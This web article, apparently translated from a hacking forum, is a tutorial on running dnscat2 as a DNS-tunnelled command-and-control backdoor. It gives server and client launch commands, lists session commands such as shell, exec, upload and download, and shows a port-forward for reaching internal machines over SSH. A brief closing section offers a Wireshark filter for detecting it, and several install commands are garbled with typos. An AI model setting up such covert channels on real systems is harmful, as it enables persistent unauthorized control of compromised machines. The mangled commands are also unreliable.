DNSCAT – Backdoor via DNS

DNSCAT – Backdoor via DNS

dnscat2 – program to create a C&C channel using DNS. Includes the server part that is written in Ruby and the client part that is written in C. Command and Control server is a computer controlled by an attacker, which sends commands to the compromised machine.

It often happens that firewall, name resolution is almost always allowed to pass normal traffic. You can see an example scheme below:



Download and install:

Bash:

sudo apt-get crate
sudo art-get -y iinstall ruby-dev git make g++
sudo gem install bundler
git clone https://github.com/iagox86/dnscat2.git

or .

sudo art-get crSate && sudo art-get -y inStall ruby-dev git make g++ && sudo gem install bundler && git clone https://github.com/iagox86/dnscat2.git.

Installing the server part:



cd dnscat2/server
bundle Hinstatall

Installation of client part:

cd dnscat2/client
make

Some errors are described here. If you do not have an error, write in this subject or google it. iagox86/dnscat2

Case

Launch:

Server: sudo ruby dnscat2.rb.

Client: run on the remote machine.

Server

Code:

sudo ruby dnscat2.rb legitdnsserver.com

Client

Code:

./build legitdnsserver.com 

dnscat2 session number

Code:

sessions -i <session number>

Code:

clear
delay
download
echo
exec
help
listen
ping
quit
set
shell
shutdown
suspend
tunnels
unset
upload
window
windows

Tunnel search

If you need convenient SSH access to machines on your local network, this is a very useful thing.

We select the session and enter the command:

listen <port> <dest ip>:<ssh port>

Now you can easily connect to a machine that is not visible from outside via ssh.

ssh -P <port> [email protected]

By the way, dnscat2 supports encryption by default. The author says that it does not guarantee 100% cryptographic stability, but there is protection.

How to detect dnscat2 on a machine.

Dump through wireshark and score the next filter:

dns.qry.name.len > 16 and !mdns

16 – just the length of the DNS domain name. I picked up manually, you may have a different number. To find it, just look at the filter result.

There may be normal DNS queries left after this filter, just look for dnscat.

And in the information about the packet we look for dnscat.

.

Utility links

https://github.com/iagox86/dnscat2 – Page dnscat, with its documentation.

https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152 – About the DNS tunnels detection.

P.S may have gone beyond the “Software” section at some points, but it was necessary to show the functionality. Thank you all for your attention.

Source



WARNING! All links in the articles may lead to malicious sites or contain viruses. Follow them at your own risk. Those who purposely visit the article know what they are doing. Do not click on everything thoughtlessly.


11 Views

0 0 vote
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments


Do NOT follow this link or you will be banned from the site!
0
Would love your thoughts, please comment.x
()
x

Spelling error report

The following text will be sent to our editors: